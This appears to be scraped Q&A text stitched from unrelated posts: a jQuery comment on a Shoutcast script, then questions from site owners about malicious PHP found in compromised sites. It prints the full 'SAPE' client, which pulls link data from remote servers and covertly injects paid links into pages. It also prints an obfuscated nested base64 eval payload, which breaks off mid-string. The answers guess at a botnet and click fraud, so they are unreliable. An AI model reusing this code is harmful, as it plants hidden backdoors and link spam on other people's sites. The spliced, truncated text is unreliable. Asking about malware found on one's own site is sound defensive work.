After SCOURING the web for 4 hours, this is the only Shoutcast metadata script I've found that works! Thankyou.
To run this constantly, why not use a setInterval combined with jQuery's AJAX call?
<script>
$(function() {
setInterval(getTrackName,16000);
});
function getTrackName() {
$.ajax({
url: "track_name.php"
})
.done(function( data ) {
$( "#results" ).text( data );
});
}
</script>
Also your last couple 'echo' lines were breaking the script for me. Just put quotes around the Meta Interval, etc....
Closed. This question is off-topic. It is not currently accepting answers.
Want to improve this question? Update the question so it's on-topic for Stack Overflow.
Closed 10 years ago.
Improve this question
I found this script attached to a modified index page. This looks like some kind of backdoor. and who is this SAPE ?
<?php
class SAPE_base {
var $_version = '1.0.8';
var $_verbose = false;
var $_charset = '';
var $_sape_charset = '';
var $_server_list = array('dispenser-01.sape.ru', 'dispenser-02.sape.ru');
var $_cache_lifetime = 3600;
var $_cache_reloadtime = 600;
var $_error = '';
var $_host = '';
var $_request_uri = '';
var $_multi_site = false;
var $_fetch_remote_type = '';
var $_socket_timeout = 6;
var $_force_show_code = false;
var $_is_our_bot = false;
var $_debug = false;
var $_ignore_case = false;
var $_db_file = '';
var $_use_server_array = false;
var $_force_update_db = false;
function SAPE_base($options = null) {
$host = '';
if (is_array($options)) {
if (isset($options['host'])) {
$host = $options['host'];
}
}
elseif (strlen($options)) {
$host = $options;
$options = array();
}
else {
$options = array();
}
if (isset($options['use_server_array']) && $options['use_server_array'] == true) {
$this->_use_server_array = true;
}
if (strlen($host)) {
$this->_host = $host;
}
else {
$this->_host = $_SERVER['HTTP_HOST'];
}
$this->_host = preg_replace('/^http:\/\//', '', $this->_host);
$this->_host = preg_replace('/^www\./', '', $this->_host);
if (isset($options['request_uri']) && strlen($options['request_uri'])) {
$this->_request_uri = $options['request_uri'];
}
elseif ($this->_use_server_array === false) {
$this->_request_uri = getenv('REQUEST_URI');
}
if (strlen($this->_request_uri) == 0) {
$this->_request_uri = $_SERVER['REQUEST_URI'];
}
if (isset($options['multi_site']) && $options['multi_site'] == true) {
$this->_multi_site = true;
}
if (isset($options['debug']) && $options['debug'] == true) {
$this->_debug = true;
}
if (isset($_COOKIE['sape_cookie']) && ($_COOKIE['sape_cookie'] == _SAPE_USER)) {
$this->_is_our_bot = true;
if (isset($_COOKIE['sape_debug']) && ($_COOKIE['sape_debug'] == 1)) {
$this->_debug = true;
$this->_options = $options;
$this->_server_request_uri = $this->_request_uri = $_SERVER['REQUEST_URI'];
$this->_getenv_request_uri = getenv('REQUEST_URI');
$this->_SAPE_USER = _SAPE_USER;
}
if (isset($_COOKIE['sape_updatedb']) && ($_COOKIE['sape_updatedb'] == 1)) {
$this->_force_update_db = true;
}
}
else {
$this->_is_our_bot = false;
}
if (isset($options['verbose']) && $options['verbose'] == true || $this->_debug) {
$this->_verbose = true;
}
if (isset($options['charset']) && strlen($options['charset'])) {
$this->_charset = $options['charset'];
}
else {
$this->_charset = 'windows-1251';
}
if (isset($options['fetch_remote_type']) && strlen($options['fetch_remote_type'])) {
$this->_fetch_remote_type = $options['fetch_remote_type'];
}
if (isset($options['socket_timeout']) && is_numeric($options['socket_timeout']) && $options['socket_timeout'] > 0) {
$this->_socket_timeout = $options['socket_timeout'];
}
if (isset($options['force_show_code']) && $options['force_show_code'] == true) {
$this->_force_show_code = true;
}
if (!defined('_SAPE_USER')) {
return $this->raise_error('Не задана константа _SAPE_USER');
}
if (isset($options['ignore_case']) && $options['ignore_case'] == true) {
$this->_ignore_case = true;
$this->_request_uri = strtolower($this->_request_uri);
}
}
function fetch_remote_file($host, $path) {
$user_agent = $this->_user_agent . ' ' . $this->_version;
#ini_set('allow_url_fopen', 1);
#ini_set('default_socket_timeout', $this->_socket_timeout);
#ini_set('user_agent', $user_agent);
if (
$this->_fetch_remote_type == 'file_get_contents'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('file_get_contents')
&&
ini_get('allow_url_fopen') == 1
)
) {
$this->_fetch_remote_type = 'file_get_contents';
if ($data = #file_get_contents('http://' . $host . $path)) {
return $data;
}
}
elseif (
$this->_fetch_remote_type == 'curl'
||
(
$this->_fetch_remote_type == ''
&&
function_exists('curl_init')
)
) {
$this->_fetch_remote_type = 'curl';
if ($ch = #curl_init()) {
#curl_setopt($ch, CURLOPT_URL, 'http://' . $host . $path);
#curl_setopt($ch, CURLOPT_HEADER, false);
#curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
#curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $this->_socket_timeout);
#curl_setopt($ch, CURLOPT_USERAGENT, $user_agent);
if ($data = #curl_exec($ch)) {
return $data;
}
#curl_close($ch);
}
}
else {
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = #fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
#fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
#fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!#feof($fp)) {
$buff .= #fgets($fp, 128);
}
#fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
return $this->raise_error('Не могу подключиться к серверу: ' . $host . $path . ', type: ' . $this->_fetch_remote_type);
}
function _read($filename) {
$fp = #fopen($filename, 'rb');
#flock($fp, LOCK_SH);
if ($fp) {
clearstatcache();
$length = #filesize($filename);
$mqr = #get_magic_quotes_runtime();
#set_magic_quotes_runtime(0);
if ($length) {
$data = #fread($fp, $length);
}
else {
$data = '';
}
#set_magic_quotes_runtime($mqr);
#flock($fp, LOCK_UN);
#fclose($fp);
return $data;
}
return $this->raise_error('Не могу считать данные из файла: ' . $filename);
}
function _write($filename, $data) {
$fp = #fopen($filename, 'ab');
if ($fp) {
if (flock($fp, LOCK_EX | LOCK_NB)) {
$length = strlen($data);
ftruncate($fp, 0);
#fwrite($fp, $data, $length);
#flock($fp, LOCK_UN);
#fclose($fp);
if (md5($this->_read($filename)) != md5($data)) {
#unlink($filename);
return $this->raise_error('Нарушена целостность данных при записи в файл: ' . $filename);
}
}
else {
return false;
}
return true;
}
return $this->raise_error('Не могу записать данные в файл: ' . $filename);
}
function raise_error($e) {
$this->_error = '<p style="color: red; font-weight: bold;">SAPE ERROR: ' . $e . '</p>';
if ($this->_verbose == true) {
print $this->_error;
}
return false;
}
function load_data() {
$this->_db_file = $this->_get_db_file();
if (!is_file($this->_db_file)) {
if (#touch($this->_db_file)) {
#chmod($this->_db_file, 0666);
}
else {
return $this->raise_error('Нет файла ' . $this->_db_file . '. Создать не удалось. Выставите права 777 на папку.');
}
}
if (!is_writable($this->_db_file)) {
return $this->raise_error('Нет доступа на запись к файлу: ' . $this->_db_file . '! Выставите права 777 на папку.');
}
#clearstatcache();
$data = $this->_read($this->_db_file);
if (
$this->_force_update_db
|| (
!$this->_is_our_bot
&&
(
filemtime($this->_db_file) < (time() - $this->_cache_lifetime)
||
filesize($this->_db_file) == 0
||
#unserialize($data) == false
)
)
) {
#touch($this->_db_file, (time() - $this->_cache_lifetime + $this->_cache_reloadtime));
$path = $this->_get_dispenser_path();
if (strlen($this->_charset)) {
$path .= '&charset=' . $this->_charset;
}
foreach ($this->_server_list as $i => $server) {
if ($data = $this->fetch_remote_file($server, $path)) {
if (substr($data, 0, 12) == 'FATAL ERROR:') {
$this->raise_error($data);
}
else {
$hash = #unserialize($data);
if ($hash != false) {
$hash['__sape_charset__'] = $this->_charset;
$hash['__last_update__'] = time();
$hash['__multi_site__'] = $this->_multi_site;
$hash['__fetch_remote_type__'] = $this->_fetch_remote_type;
$hash['__ignore_case__'] = $this->_ignore_case;
$hash['__php_version__'] = phpversion();
$hash['__server_software__'] = $_SERVER['SERVER_SOFTWARE'];
$data_new = #serialize($hash);
if ($data_new) {
$data = $data_new;
}
$this->_write($this->_db_file, $data);
break;
}
}
}
}
}
if (strlen(session_id())) {
$session = session_name() . '=' . session_id();
$this->_request_uri = str_replace(array('?' . $session, '&' . $session), '', $this->_request_uri);
}
$this->set_data(#unserialize($data));
}
}
class SAPE_client extends SAPE_base {
var $_links_delimiter = '';
var $_links = array();
var $_links_page = array();
var $_user_agent = 'SAPE_Client PHP';
function SAPE_client($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function return_links($n = null, $offset = 0) {
if (is_array($this->_links_page)) {
$total_page_links = count($this->_links_page);
if (!is_numeric($n) || $n > $total_page_links) {
$n = $total_page_links;
}
$links = array();
for ($i = 1; $i <= $n; $i++) {
if ($offset > 0 && $i <= $offset) {
array_shift($this->_links_page);
}
else {
$links[] = array_shift($this->_links_page);
}
}
$html = join($this->_links_delimiter, $links);
if (
strlen($this->_charset) > 0
&&
strlen($this->_sape_charset) > 0
&&
$this->_sape_charset != $this->_charset
&&
function_exists('iconv')
) {
$new_html = #iconv($this->_sape_charset, $this->_charset, $html);
if ($new_html) {
$html = $new_html;
}
}
if ($this->_is_our_bot) {
$html = '<sape_noindex>' . $html . '</sape_noindex>';
}
}
else {
$html = $this->_links_page;
}
if ($this->_debug) {
$html .= print_r($this, true);
}
return $html;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.links.db';
}
else {
return dirname(__FILE__) . '/links.db';
}
}
function _get_dispenser_path() {
return '/code.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
if ($this->_ignore_case) {
$this->_links = array_change_key_case($data);
}
else {
$this->_links = $data;
}
if (isset($this->_links['__sape_delimiter__'])) {
$this->_links_delimiter = $this->_links['__sape_delimiter__'];
}
if (isset($this->_links['__sape_charset__'])) {
$this->_sape_charset = $this->_links['__sape_charset__'];
}
else {
$this->_sape_charset = '';
}
if (#array_key_exists($this->_request_uri, $this->_links) && is_array($this->_links[$this->_request_uri])) {
$this->_links_page = $this->_links[$this->_request_uri];
}
else {
if (isset($this->_links['__sape_new_url__']) && strlen($this->_links['__sape_new_url__'])) {
if ($this->_is_our_bot || $this->_force_show_code) {
$this->_links_page = $this->_links['__sape_new_url__'];
}
}
}
}
}
class SAPE_context extends SAPE_base {
var $_words = array();
var $_words_page = array();
var $_user_agent = 'SAPE_Context PHP';
var $_filter_tags = array('a', 'textarea', 'select', 'script', 'style', 'label', 'noscript', 'noindex', 'button');
function SAPE_context($options = null) {
parent::SAPE_base($options);
$this->load_data();
}
function replace_in_text_segment($text) {
$debug = '';
if ($this->_debug) {
$debug .= "<!-- argument for replace_in_text_segment: \r\n" . base64_encode($text) . "\r\n -->";
}
if (count($this->_words_page) > 0) {
$source_sentence = array();
if ($this->_debug) {
$debug .= '<!-- sentences for replace: ';
}
foreach ($this->_words_page as $n => $sentence) {
//Заменяем все сущности на символы
$special_chars = array(
'&' => '&',
'"' => '"',
''' => '\'',
'<' => '<',
'>' => '>'
);
$sentence = strip_tags($sentence);
foreach ($special_chars as $from => $to) {
str_replace($from, $to, $sentence);
}
$sentence = htmlspecialchars($sentence);
$sentence = preg_quote($sentence, '/');
$replace_array = array();
if (preg_match_all('/(&[#a-zA-Z0-9]{2,6};)/isU', $sentence, $out)) {
for ($i = 0; $i < count($out[1]); $i++) {
$unspec = $special_chars[$out[1][$i]];
$real = $out[1][$i];
$replace_array[$unspec] = $real;
}
}
foreach ($replace_array as $unspec => $real) {
$sentence = str_replace($real, '((' . $real . ')|(' . $unspec . '))', $sentence);
}
$source_sentences[$n] = str_replace(' ', '((\s)|( ))+', $sentence);
if ($this->_debug) {
$debug .= $source_sentences[$n] . "\r\n\r\n";
}
}
if ($this->_debug) {
$debug .= '-->';
}
$first_part = true;
if (count($source_sentences) > 0) {
$content = '';
$open_tags = array();
$close_tag = '';
$part = strtok(' ' . $text, '<');
while ($part !== false) {
if (preg_match('/(?si)^(\/?[a-z0-9]+)/', $part, $matches)) {
$tag_name = strtolower($matches[1]);
if (substr($tag_name, 0, 1) == '/') {
$close_tag = substr($tag_name, 1);
if ($this->_debug) {
$debug .= '<!-- close_tag: ' . $close_tag . ' -->';
}
}
else {
$close_tag = '';
if ($this->_debug) {
$debug .= '<!-- open_tag: ' . $tag_name . ' -->';
}
}
$cnt_tags = count($open_tags);
if (($cnt_tags > 0) && ($open_tags[$cnt_tags - 1] == $close_tag)) {
array_pop($open_tags);
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - deleted from open_tags -->';
}
if ($cnt_tags - 1 == 0) {
if ($this->_debug) {
$debug .= '<!-- start replacement -->';
}
}
}
if (count($open_tags) == 0) {
if (!in_array($tag_name, $this->_filter_tags)) {
$split_parts = explode('>', $part, 2);
if (count($split_parts) == 2) {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $split_parts[1]) == 1) {
$split_parts[1] = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $split_parts[1], 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
$part = $split_parts[0] . '>' . $split_parts[1];
unset($split_parts);
}
}
else {
$open_tags[] = $tag_name;
if ($this->_debug) {
$debug .= '<!-- ' . $tag_name . ' - added to open_tags, stop replacement -->';
}
}
}
}
else {
foreach ($source_sentences as $n => $sentence) {
if (preg_match('/' . $sentence . '/', $part) == 1) {
$part = preg_replace('/' . $sentence . '/', str_replace('$', '\$', $this->_words_page[$n]), $part, 1);
if ($this->_debug) {
$debug .= '<!-- ' . $sentence . ' --- ' . $this->_words_page[$n] . ' replaced -->';
}
unset($source_sentences[$n]);
unset($this->_words_page[$n]);
}
}
}
if ($this->_debug) {
$content .= $debug;
$debug = '';
}
if ($first_part) {
$content .= $part;
$first_part = false;
}
else {
$content .= $debug . '<' . $part;
}
unset($part);
$part = strtok('<');
}
$text = ltrim($content);
unset($content);
}
}
else {
if ($this->_debug) {
$debug .= '<!-- No word`s for page -->';
}
}
if ($this->_debug) {
$debug .= '<!-- END: work of replace_in_text_segment() -->';
}
if ($this->_is_our_bot || $this->_force_show_code || $this->_debug) {
$text = '<sape_index>' . $text . '</sape_index>';
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$text .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
if (count($this->_words_page) > 0) {
$text .= '<!-- Not replaced: ' . "\r\n";
foreach ($this->_words_page as $n => $value) {
$text .= $value . "\r\n\r\n";
}
$text .= '-->';
}
$text .= $debug;
}
return $text;
}
function replace_in_page(&$buffer) {
if (count($this->_words_page) > 0) {
$split_content = preg_split('/(?smi)(<\/?sape_index>)/', $buffer, -1);
$cnt_parts = count($split_content);
if ($cnt_parts > 1) {
//Если есть хоть одна пара sape_index, то начинаем работу
if ($cnt_parts >= 3) {
for ($i = 1; $i < $cnt_parts; $i = $i + 2) {
$split_content[$i] = $this->replace_in_text_segment($split_content[$i]);
}
}
$buffer = implode('', $split_content);
if ($this->_debug) {
$buffer .= '<!-- Split by Sape_index cnt_parts=' . $cnt_parts . '-->';
}
}
else {
$split_content = preg_split('/(?smi)(<\/?body[^>]*>)/', $buffer, -1, PREG_SPLIT_DELIM_CAPTURE);
if (count($split_content) == 5) {
$split_content[0] = $split_content[0] . $split_content[1];
$split_content[1] = $this->replace_in_text_segment($split_content[2]);
$split_content[2] = $split_content[3] . $split_content[4];
unset($split_content[3]);
unset($split_content[4]);
$buffer = $split_content[0] . $split_content[1] . $split_content[2];
if ($this->_debug) {
$buffer .= '<!-- Split by BODY -->';
}
}
else {
if ($this->_debug) {
$buffer .= '<!-- Can`t split by BODY -->';
}
}
}
}
else {
if (!$this->_is_our_bot && !$this->_force_show_code && !$this->_debug) {
$buffer = preg_replace('/(?smi)(<\/?sape_index>)/', '', $buffer);
}
else {
if (isset($this->_words['__sape_new_url__']) && strlen($this->_words['__sape_new_url__'])) {
$buffer .= $this->_words['__sape_new_url__'];
}
}
if ($this->_debug) {
$buffer .= '<!-- No word`s for page -->';
}
}
return $buffer;
}
function _get_db_file() {
if ($this->_multi_site) {
return dirname(__FILE__) . '/' . $this->_host . '.words.db';
}
else {
return dirname(__FILE__) . '/words.db';
}
}
function _get_dispenser_path() {
return '/code_context.php?user=' . _SAPE_USER . '&host=' . $this->_host;
}
function set_data($data) {
$this->_words = $data;
if (#array_key_exists($this->_request_uri, $this->_words) && is_array($this->_words[$this->_request_uri])) {
$this->_words_page = $this->_words[$this->_request_uri];
}
}
}
?>
Sape is apparently link exchange service used by a Russian-speaking botnet owner.
This backdoor appears to use the sape API to download XML and use bots to create a "context" that probably clicks links to generate illicit revenue.
From a bad Google transition of sape.ru:
Sape system increases revenue and reduces the consumption of
webmasters optimizers. Venues are beginning to sell the place, not
only from the main pages, but also internal. How many pages on the
site? Let each revenue. Optimizers are buying cheap internal pages and
save on moving projects.
My Russian isn't very good, but sape.ru looks like some kind of link exchange service. And in answer to your question "Who is SAPE":
[david#archtower ~]$ whois sape.ru
% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).
domain: SAPE.RU
nserver: ns1.q0.ru.
nserver: ns2.q0.ru.
nserver: ns3.q0.ru.
state: REGISTERED, DELEGATED, VERIFIED
org: LTD Sape
registrar: R01-REG-RIPN
admin-contact: https://partner.r01.ru/contact_admin.khtml
created: 2006.06.20
paid-till: 2013.06.20
free-date: 2013.07.21
source: TCI
Last updated on 2012.06.19 19:28:42 MSK
[david#archtower ~]$
Looks like it's something to automatically visit ads referral links at first glance.
I built a website for a client a while ago who has been having issues with it. After getting into the site files I found this at the top of one of the PHP classes:
<?php
/*ad0b18735e68b25aa9c4374221824db5_on*/ $byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb= array('8759','8776','8755','8766');$ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P= array('8569','8584','8571','8567','8586','8571','8565','8572','8587','8580','8569','8586','8575','8581','8580');$J0BQOOWj4oRnP7liN= array('7450','7449','7467','7453','7406','7404','7447','7452','7453','7451','7463','7452','7453');$UbjPmIKWlC="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa2RXU0dKSWNHdFRSVEYyVTFkMGEySkhVa1pOVjJocFZqQldjRk14VG5OT01HeEVVVzB4YTFaNlZuRmFSV1J6WkcxS2NGRnVVbWxOYkVwdFYxUkpOV1JWZEVSVmJXeHJWakZzZDFwVVRrOU5SMDV6VDFoQ2FtSldXak5aYTJSSFlXeHdWRm95YkZGU01IQXlWMnRvY2tzd2JIQmtNbXhSVWpCd01sZHJhSEpMTUd4d1pESjBXbUpzV25SVVJVNVRZVzFLZFZWdFdtaFJNbk16V1Zaa1dsb3dkRVJWYlhCcFlteEtiVmxWVGtKUFZrSlVVVmhvVEZVd1NUTlRhMlJMVFZad2NGRlViRXBUUlRSM1dUSjNOV05IVG5SV2JtUnBVakJhY1Zkc1RtNWhWa0pJVTI1YVlWTkhjM0pUVjJ3ellWWkNTRk51V21GVFIzTnlVMWRzUW1SVmJFbFVha0pxWWxkNE0xbDZTalJoUjAxNVlVZDRhbVZYWkhKWFJFWlBVbXhXYzFkcldsWmlTRTV3VjJwSk5XUnNjRVJUYlZKTVZUTmtjbGRYTlZkaVZYUlZZekprYW1KV1dYZGFSbWhMWkZWc1JGVnRiR3RXTVdzeldteG9UMDFIVG5OUFdFSnFZbFphTTFsclpFZGhiSEJVV2pKc1VWRjZiSEJaYWtwVFRsWkNjRk5ZVGtwaGJtUXlWMWN3TldFeVZsVk9SMnhOVVRGS2NGcEdaRnBqTUhCSVZHNVdhMUpxYkhaVE1WSXdZMFp3Y0ZGWE9VdFNNRFV4V2tWWk5XSXdiRVZOUkd4S1VrVldkMU5WYUhwaE1XeDFWbTB4U2xKRVFtNVplazVUWlZabmVXSkliR0ZYUlVwNlYxWmtUMkpGZEVSVFZHaE5UV3R3TWxkcmFISkxNR3h3WlVod2ExTkZjSGRaTUdoUFl6RnNXVlJ0T1dGWFJURjJVMnRaTlZaR1NsZFRiR1JUVm10d2FWTlhNV3RrYlVsNVZWZHNXVlV5ZERGVFYzQXpaR3hzZEU5WGRHeFdSRkp3VkVWT1UyRlhVbGhYV0VKUVpWVktOVmRzYUZOTlYwNTBUa2RrUzFJd2IzaFhiWEF3VDFkT2RGWnFRbXRYUlhBeFUxVk9VMkZYVWxoWFZHUnRWakZ2ZUZsdE1VOU5SMFpZVDFoV1NsSjZiRE5YVm1NeFkyMUdWRm95ZEZwaWJGcDBVekZvZW1FeGIzcGpSMXBoVlRCRk5WTlZaR0ZoUjBwSlZHMTRVR1ZXU25aWFJFb3pXakZDVkZGdE9XRldNRnB5VjJ4b1MyVnNaM2xsU0VKcVRURkdkbE14VWpCalJuQndVVmM1YUZaNlZtMVhWbWhMWlZac1dXRXlPVXBoTURVeVdXMDFVMkpIU25WVldGSlRWbnBXY1ZscVNsTmpSMHAwV1hwYVNsSXlVVEpaVm1oQ1lWVjRSRkZYZEdoU2FteDZVekZPY2xveVZqVlJWM1JoVFROQ2JWZHNUa0pQVld4SlZXNXNhMVl4VlROYWJHUnpZbFZzUkZveWRHRk5NMEp0VjJ4T2MwNHdjRWxWYmxKcVVqRndNVmRXWTNoaVJXeEZUVWRrYTFJeFdqQlpNR014WVVkS1ZGb3liRTFOTVVvd1dUQk9TbU13YkVSVGEyUlZUVVJvY0ZNeFVqQmlWMFpZWlVkNFdVMHdTWGhhUlZrMVlXMUplVTVVUW1GV2VsVjNXVE5zYm1FeVVraE5XR1JoWWxSV2IxbHNaRlpqTUd4RVZXMXNhMVl4YkhkVU0yeFRUbXh3UkZGVWJFcFNNbEV5V1dwT1EySkhTbkJhTW5SclVucEdNMWR0TURGaFIwcFlWbGhPU2xFd2NEVlRWMnh5VGpCd1NGUnVXbWxpYkVweldXMDFVMlZyYkVWTlIyUmhUVE5DTlZkc1pFZGhNSFJFVldwYVlWRXpaRzVVVmxKQ1pEQXhSVkZZWkU1U1JVWjNWRE5zVTJGdFNYbE9WRUpoVm5wVmQxa3piRUpQVld4SVRWaGFZVkpxYkhGWmFra3dZakJ3U0ZSdVdtbGliRXB6V1cwMVUyVnJkRlZrUnpWc1lsVTFlbGxxVGs5aVJYUkVWV3BhWVZFeWN6TmFSbU14WXpKR1dFNVlTa3hSTVVsM1dXeG9RMkpYU25SU2JsSmhWVEp6TTFOclpFOWtiVXAxVlcxNGFXSnNTalpUVlZGM1dqRnZlbU5IZUdsaVZUVXlWMnRrVm1Jd2NFaFVibHBwWW14S2MxbHROVk5sYTNSVlpFUnNTbEl4V25wWmVrcFdXakpXTlZWdGNHbE5hbFYzVjJ4ak1VMUhUalZSVkd4S1VucEdNbGRyV1RWaGJVbDVUa2M1UzFJd2IzaFhiV3h5VGpKYVZGVnVUbUZXZWxKdVZVWk9RMlZ0VWtsVGJrNWhWbnBTZGxOclpFOWtiVXAxVlcxNGFXSnNTalpUTVZJd1lqRndXRkp0ZEdGWFJXeDJVMWQwVDJSdFNuVlZiWGhwWW14R01GWkZaRmRrVm05NlZXMDVVR0ZWUm5CVVIyeFRZekZ3V0U1SVFsQk5NSEJ6V2tWb1YyVlhTbkJhTW5SYVRXcHNNVnBGWkZka1YxSkpWRmhDVUUxNlFtNVhiVFZYWkZacmVsVnVRbWxOYWxKdVZXcEtWMDFHVWxoU2JsSmFWVEprZDFwWWJGTmtSMGw2VlcwNVlWZEZiRzVWUms1Q1lWZEtXRlZ1YkdsV01WcHlXVlprUjJKdFRuUlBWRVpxVVhwV2NWbHFTWGRoVlRoNlUyMTRhMU5HV2pWWmJXeENZVEpLV0U5VVFtaFNNVm8xVkhwTmVHUnNiSE5QV0hCclVqQmFOVnBGVG01aFYwbDZVVzFvYVdKWVVuZFRWMnh5VGpGd2RWWnVWbHBOTVVwM1dXcEpNRm94YkZoaFJ6RnJWakZLZEZsclpHRk9iSEJJWVVjeGFGTkZNWFpUYTJoRFlVVjBXV015ZEdsV01Gb3dWMVpPUWs5VmJFWmFSM2hyVWxSR2IxbHNaRVppTUhSVll6SjBZV0pYZUhwWGJFNUNUMVZzU1ZadWJHbFNNVm94VjFSSk5XRXhjRlJoUjFwWlRVWndTMVpGVmxkYWJHZzFZWHBrYUZZeGJHNVRNR1J6WlcxTmVWWnFRa3hSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQzWVVaQ1ZrMVdSbkJYUms1eVkwZFdOVlZ0T1dsTk1EUjNVMVZSZDFvd2NFZFBWbEpUVm10d1dGVnNXa3RaYTJ4eVlVWldWMUpyU20xVk1GVTFWa1phUkZOdFVsQk5la0p1VjJ4a05HVnNjRlJSYW1STFVqSm9NbGw2VGxKYU1VSlVVVmRzU21GdVVUVlpWbVJhV2pCMFNHSkljR3BOYkZsM1V6Qk9VMXBzVlhkV2JFNVhZVEZhVkZZemJFdFZNVXBXVFZaQ1YxSldXbTFWVmxaVFVsWldjRk50VWt4Vk1uY3pVMnRrYzJRd2JFVk5SMlJMVW1wc1ZWVnNXa3RXTVVwWFUyMUtTbUpGY0VkV1JsVTFWbFpLVjA5VlNsTlNWa3BVVTFkM2QwNHlXbFJSYlhocFUwVTFjMU5WYUhwaE1rWlpVVmRrVVZVd1JuQlRWM0F3VDFkR1dGZFhaRXhTTW5nMldYcEtWMDFGZEVSVmJWcFdUVVphVkZadGRGZFZNV1ExVTJ0c1YxSnNTbEpYUkVaTFVteEtjbFpzVGxOV2EyeHdWMFpPY21OSFZqVlZibXhoVmpGc2JsVkdUa05OVjA1MFpVZDRhV0pWTlRKWGEyUldZakJ3UjA5V1VsTldhM0JZVld4YVMxbHJiSEpoUmxaWFVtdEtiVlpYZEZkU01VcFhVMnRhVm1GVmNHdFRNVkl3VDFWc1NGWnVUbXBOYkZadVdsaHNVMlZXY0ZoWFYyUlJWVEJHY0ZOWGNEQlBWMFpZVjFka1RGSXllRFpaZWtwWFRVVjBSRlZ0V2xaTlJscFVWbTEwVjFVeFpEVlRhMnhYVW14S1VsZEVSbGRXUmtwWFUyMWFVbFpYVWtkV1IzaFNZVlpvVkdFelFteGxWa2w0VjFaT1FrOVZiRWxXYm14cFVqRmFNVmRVU1RWaE1YQlVZVWh3YTFORmIzZFpha28wWkcxUmVWWnViRXhSTVVwdFZsUkNWMVV4V25KV2JFNVlaVlZ3U2xacldsTlZWbWQ0Vm14U1UxWnJjRzFWVmxaclVteFNjMVZYYkZsVk1uUjNWSHBOZDFveGNGaGxTSEJoVlRCSk0xTnJhRmRoUld4RlRVZGtTbUZWYXpOYWJHUnpZbFZzUkdGSVFtcE5NRFZ6V2tWT2JtRXhaM2hVYTFwV1lrWndSMVpYZUhwaFZsWlhWbXRhVm1KSGVHMVdWRVpUVlRGT1ZrNVZhRXBpUkVKM1V6Rm9lbUV5VGxsVVYyUlJWVEJKZUZreU1UUmlSMHAwVkc1YVlWSXhWblpUYTFrMVZrWktWMU5zWkZOV2EzQnBVMWQ0UjFac1NsZFRiSEJaVFZVMVZsWlhkSE5VTVVvMVUyMVNURlpJVVRWVFZXUlhZekpOZVZaWFpHeGxWa28wV1ROc1FrOVZiRVJUVjJ4UVRYcENjbHBHYUV0ak1XZzJVVmRrVVZVd1JuQlpWV2hUVFVkT1JXSXpXazFsVld4dVZFZHNRbUV5VGtoU1ZHUkxVMFphTlZscldUUmxSV3hGVFVka1NtRlViSGhYYkdSVFkwVjRkVkZ0T1dwU1JHdDVWMnhvUzJWdFJsaFBXRlpSVmtWRk1WUXhVazVpVjBwWVQxUkNhRkl4V2pWVlJrNUtXakI0Y0ZWdVVscFdla1p2VTFWTk1Gb3diSEJYYlRGb1ZqTm9jMVZHVGtwYU1IaHdVVmQwWVdKWGVIcFhiRTVDWkZWc1JGTlhNV2hTZW13MldrVlJkMkZWYkVST1IyUkxVakpvTWxsNlRsSmFNSGh3VVZkc1MySlhlRE5WUms1S1dqQjRjRkZYZEdoWFJVWnVWRWRzUW1GVmNIVlRiWGhoWVdwQ2NGTlZUVEJhTUhCSlUyMTRZV0ZWUmpGVFZVNUtZbGRTV0ZKVWJFcGhWVVl4VTJ0b1YyRkZiRVJPUjJSS1lWWndORmt6YjNkaFZXeEVUa2RrUzFORldqWlVNMnhUVFVkT2RXRXlaRkZWTUVsM1dUSTFWMkpGT0hsaVJ6Rk1VVEJLZEZwR1l6RmhiVkpJWWtoYWFXSkViSE5hVldSelpXMVNTVlJYT1VwaVZUUjRXVEl4TkZwdFJsaE9XRUpyVVRCc2QxTlZUbk5PTUhCSVZHMDVTbEpFUW01WFZFNVhaVmRLUjA5WVFtbGlWM2QzVXpCT1UwMVhUblJsUjFwT1VUQkdNVk5WVGxOTlYwNTBaVWRhVGxVeWN6TlhWRTVYWlZkS1IwOVljR0ZYUmtveVdUQm9VbUl3Y0VoVWJUbE5VVEJLUlZac1drdFVWbEY0VVd4V1dVMVZjRWRXYTFwWFZURlNjMVZzVGxKV1ZGWlZWVzEwVjFVd2VFUlJXR2hNVmtoU2NWcEdhRXRqTVdkNlZHMTRhMUo2YkROYVJVNXVZVEZyZVZvelRrcFNWVFZYVmxkME5GVkdWa2RWYlZwWFVsZDRUMVZzVlRWV2JGcEVaREprVG1WWGN6TlRhMmhYWXpKU1JGRlViRXBUUmtvMVdWWmpkMkl4YTNwV2JteHBVbXBzYzFwVlpGZGhhM1JFVlcxd2FGRXlkSGRVTTJ4VFRVZE9kV0V5WkZGVk1FcDBWMVprTkdWc2NGVmtSR3hLVWpKNGRGTlZUbTVpTWtaWVRsaENXVTF0VW5